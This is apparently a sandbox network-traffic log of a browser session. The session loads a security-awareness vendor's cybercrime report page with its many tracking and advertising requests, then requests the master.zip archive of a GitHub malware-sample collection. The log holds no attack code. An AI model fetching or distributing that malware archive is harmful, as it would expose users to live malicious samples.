GET https://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=3&trackerid=KkJOX7&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsHTTP Request
GET https://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsHTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=3&rec=1&r=843940&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?action_name=Cybercrime%20Trends%202024%20%7C%20Report&idsite=4&rec=1&r=906109&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=1&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&pf_net=142&pf_srv=516&pf_tfr=3&pf_dm1=611&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Response
200HTTP Response
200HTTP Response
204HTTP Response
204HTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=3&rec=1&r=133034&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?e_c=abtesting&e_a=CCT24selfattribution&e_n=original&ca=1&idsite=4&rec=1&r=724281&h=15&m=32&s=26&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Response
400HTTP Response
204HTTP Request
GET https://sosafeawareness.matomo.cloud/plugins/HeatmapSessionRecording/configs.php?idsite=4&trackerid=etRRke&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threatsHTTP Response
200HTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=3&rec=1&r=756449&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=c9715e882b41a221&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=THCnEn&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Request
POST https://sosafeawareness.matomo.cloud/matomo.php?fa_vid=nZCiYW&fa_id=hsForm_3e5bc83a-1db9-4cbc-a714-816d21b3786f&fa_fv=1&ca=1&idsite=4&rec=1&r=608603&h=15&m=32&s=27&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%20threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%20threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%20threats&urlref=https%3A%2F%2Fwww.bing.com%2F&_id=5386e3a2dcbb0558&_idn=0&send_image=0&_rcn=UKI_EN_Non-branded_Q12023&_rck=Cyber%20threat&_refts=1709220746&_ref=https%3A%2F%2Fwww.bing.com%2F&pv_id=86Faos&uadata=%7B%22model%22%3A%22%22%2C%22platform%22%3A%22Windows%22%2C%22platformVersion%22%3A%2210.0%22%2C%22uaFullVersion%22%3A%2292.0.902.67%22%7D&pdf=1&qt=0&realp=0&wma=0&fla=0&java=0&ag=0&cookie=1&res=1280x720HTTP Response
204HTTP Response
204 -
1.4kB 3.0kB 8 5
-
1.0kB 6.2kB 10 11
-
1.4kB 4.3kB 8 6
-
104.84.69.31:443https://imgsct.cookiebot.com/1.gif?dgi=9342a10a-36bc-4a36-99a3-f105675e7f78tls, http2msedge.exe2.6kB 7.5kB 19 26
HTTP Request
GET https://consentcdn.cookiebot.com/sdk/bc-v4.min.htmlHTTP Request
GET https://consentcdn.cookiebot.com/consentconfig/9342a10a-36bc-4a36-99a3-f105675e7f78/sosafe-awareness.com/configuration.jsHTTP Response
200HTTP Response
200HTTP Request
GET https://imgsct.cookiebot.com/1.gif?dgi=9342a10a-36bc-4a36-99a3-f105675e7f78HTTP Response
200 -
104.18.160.125:443https://forms.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1tls, httpmsedge.exe2.4kB 4.6kB 17 18
HTTP Request
GET https://forms.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-DEFINITION_SUCCESS&count=1HTTP Response
200 -
104.17.239.249:443https://forms-na1.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1tls, httpmsedge.exe3.5kB 4.7kB 18 19
HTTP Request
GET https://forms-na1.hsforms.com/embed/v3/counters.gif?key=forms-embed-v2-RENDER_SUCCESS&count=1HTTP Response
200 -
74.125.193.147:443https://www.google.com/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747tls, http2msedge.exe2.5kB 7.2kB 21 22
HTTP Request
POST https://www.google.com/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747 -
2.5kB 23.9kB 24 34
HTTP Request
GET https://snap.licdn.com/li.lms-analytics/insight.min.jsHTTP Response
200HTTP Request
GET https://snap.licdn.com/li.lms-analytics/insight.old.min.jsHTTP Response
200 -
2.4kB 7.5kB 23 23
HTTP Request
GET https://js.hsadspixel.net/fb.jsHTTP Response
200 -
2.6kB 20.0kB 27 31
HTTP Request
GET https://cdn.requestmetrics.com/agent/current/rm.jsHTTP Response
200 -
209.85.202.154:443https://googleads.g.doubleclick.net/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747tls, http2msedge.exe3.3kB 9.4kB 23 23
HTTP Request
GET https://googleads.g.doubleclick.net/pagead/viewthroughconversion/774274612/?random=1709220747456&cv=11&fst=1709220747456&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&hn=www.googleadservices.com&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&did=dMWZhNz&gdid=dMWZhNz&npa=0&us_privacy=1---&pscdl=noapi&auid=1087893979.1709220747&uaa=x86&uamb=0&uap=Windows&uapv=10.0&uaw=0&data=event%3Dgtag.config&rfmt=3&fmt=4HTTP Request
GET https://googleads.g.doubleclick.net/pagead/landing?gcs=G111&gcd=13r3r3r3r5&rnd=1437616816.1709220747&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&dma=0&npa=0>m=45He42q1n81P7K4KZ2v830866029za220&auid=1087893979.1709220747 -
468 B 1.7kB 7 6
HTTP Request
GET http://apps.identrust.com/roots/dstrootcax3.p7cHTTP Response
200 -
1.2kB 1.2kB 13 10
-
172.253.116.94:443https://www.google.co.uk/pagead/1p-user-list/774274612/?random=1709220747456&cv=11&fst=1709218800000&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&npa=0&data=event%3Dgtag.config&fmt=3&is_vtc=1&cid=CAQSGwB7FLtq5lyiNwCkd7BXTxrl0ucmmBssg0GEvw&random=4204668073&rmt_tld=1&ipr=ytls, http2msedge.exe3.0kB 7.1kB 21 23
HTTP Request
GET https://www.google.co.uk/pagead/1p-user-list/774274612/?random=1709220747456&cv=11&fst=1709218800000&bg=ffffff&guid=ON&async=1>m=45be42q1v867966968z8830866029za200&gcd=13r3r3r3r5&dma=0&u_w=1280&u_h=720&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&ref=https%3A%2F%2Fwww.bing.com%2F&frm=0&tiba=Cybercrime%20Trends%202024%20%7C%20Report&npa=0&data=event%3Dgtag.config&fmt=3&is_vtc=1&cid=CAQSGwB7FLtq5lyiNwCkd7BXTxrl0ucmmBssg0GEvw&random=4204668073&rmt_tld=1&ipr=y -
104.16.80.186:443https://js.hs-analytics.net/analytics/1669385400000/8858700.jstls, http2msedge.exe2.8kB 27.4kB 32 43
HTTP Request
GET https://js.hs-analytics.net/analytics/1669385400000/8858700.jsHTTP Response
200 -
2.2kB 4.7kB 19 20
HTTP Request
GET https://js-na1.hs-scripts.com/8858700.jsHTTP Response
200 -
943 B 2.9kB 8 6
-
943 B 2.9kB 8 6
-
104.19.154.83:443https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748254&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0tls, http2msedge.exe4.4kB 6.8kB 26 28
HTTP Request
GET https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748251&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0HTTP Request
GET https://track.hubspot.com/__ptq.gif?k=15&fi=3e5bc83a-1db9-4cbc-a714-816d21b3786f&fci=ba6b3dd5-6c11-4eb8-8877-1c29f484a5cb&ft=0&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748252&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0HTTP Request
GET https://track.hubspot.com/__ptq.gif?k=1&sd=1280x720&cd=24-bit&cs=UTF-8&ln=en-us&bfp=1331607227&v=1.1&a=8858700&rcu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F&r=https%3A%2F%2Fwww.bing.com%2F&pu=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&t=Cybercrime+Trends+2024+%7C+Report&cts=1709220748254&vi=23818aedeab7461f24816ee8a31e332e&nc=true&ce=false&cc=0HTTP Response
200HTTP Response
200HTTP Response
200 -
2.6kB 26.5kB 29 39
HTTP Request
GET https://js.hs-banner.com/8858700.jsHTTP Response
200 -
13.107.42.14:443https://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2&cookiesTest=truetls, http2msedge.exe4.9kB 7.9kB 22 21
HTTP Request
POST https://px.ads.linkedin.com/wa/HTTP Request
GET https://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2HTTP Request
GET https://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748583&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2HTTP Response
302HTTP Request
GET https://px.ads.linkedin.com/collect?v=2&fmt=js&pid=2911873&time=1709220748584&li_adsId=11dbaf3d-d481-4480-bdb0-df567756caab&url=https%3A%2F%2Fsosafe-awareness.com%2Fresources%2Freports%2Fcybercrime-trends%2F%3Futm_term%3DCyber%2520threat%26utm_campaign%3DUKI_EN_Non-branded_Q12023%26utm_source%3Dbing%26utm_medium%3Dpaid%26hsa_acc%3D2315609737%26hsa_cam%3D19566844529%26hsa_grp%3D1170981718251103%26hsa_ad%3D%26hsa_src%3Do%26hsa_tgt%3Dkwd-73187050925940%3Aloc-188%26hsa_kw%3DCyber%2520threat%26hsa_mt%3Dp%26hsa_net%3Dadwords%26hsa_ver%3D3%26msclkid%3D0be5aded059518b58e19c80da6f10d66%26utm_content%3DCyber%2520threats&tm=gtmv2&cookiesTest=trueHTTP Response
302 -
931 B 4.9kB 9 7
-
931 B 4.9kB 9 7
-
172.64.153.27:443https://js.hs-banner.com/cookie-banner-public/v1/cf-locationtls, http2msedge.exe2.3kB 3.9kB 20 21
HTTP Request
GET https://js.hs-banner.com/cookie-banner-public/v1/cf-locationHTTP Response
200 -
1.0kB 970 B 8 9
-
1.2kB 3.1kB 13 11
-
51.161.119.92:443https://in.requestmetrics.com/v1?token=k3gg9vg:z3ei6ny&v=2.2.0tls, http2msedge.exe35.4kB 5.0kB 40 26
HTTP Request
POST https://in.requestmetrics.com/v1?token=k3gg9vg:z3ei6ny&v=2.2.0HTTP Response
202 -
140.82.121.4:443https://github.com/Endermanch/MalwareDatabase/archive/refs/heads/master.ziptls, http2msedge.exe5.9kB 109.1kB 69 106
HTTP Request
GET https://github.com/Endermanch/MalwareDatabaseHTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/security/overall-countHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/spoofed_commit_check/18497187aa0dc5af76852a256cd0a3fceb7c4ab9HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/hovercards/citation/sidebar_partial?tree_name=masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/used_by_listHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/refs?type=branchHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/latest-commit/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tree-commit-info/masterHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/branch-countHTTP Request
GET https://github.com/Endermanch/MalwareDatabase/tag-countHTTP Response
200HTTP Response
204HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/manifest.jsonHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/archive/refs/heads/master.zipHTTP Response
302HTTP Request
GET https://github.com/Endermanch/MalwareDatabase/archive/refs/heads/master.zipHTTP Response
302 -
1.0kB 3.3kB 10 8
-
185.199.108.154:443https://github.githubassets.com/assets/chunk-vendors-node_modules_consent-banner_dist_consent-banner_js-7ef3071b711c.jstls, http2msedge.exe34.8kB 1.0MB 533 831
HTTP Request
GET https://github.githubassets.com/assets/light-0eace2597ca3.cssHTTP Request
GET https://github.githubassets.com/assets/dark-a167e256da9c.cssHTTP Request
GET https://github.githubassets.com/assets/primer-primitives-2ef2a46b27ee.cssHTTP Request
GET https://github.githubassets.com/assets/primer-08e422afeb43.cssHTTP Request
GET https://github.githubassets.com/assets/global-6a61d5daf002.cssHTTP Request
GET https://github.githubassets.com/assets/github-29c178bef838.cssHTTP Request
GET https://github.githubassets.com/assets/repository-6247ca238fd4.cssHTTP Request
GET https://github.githubassets.com/assets/code-6d7b4ef0ea51.cssHTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Response
200HTTP Request
GET https://github.githubassets.com/assets/wp-runtime-500859bfc7df.jsHTTP Request
GET https://github.githubassets.com/assets/vendors-node_modules_dompurify_dist_purify_js-6890e890956f.jsHTTP Request
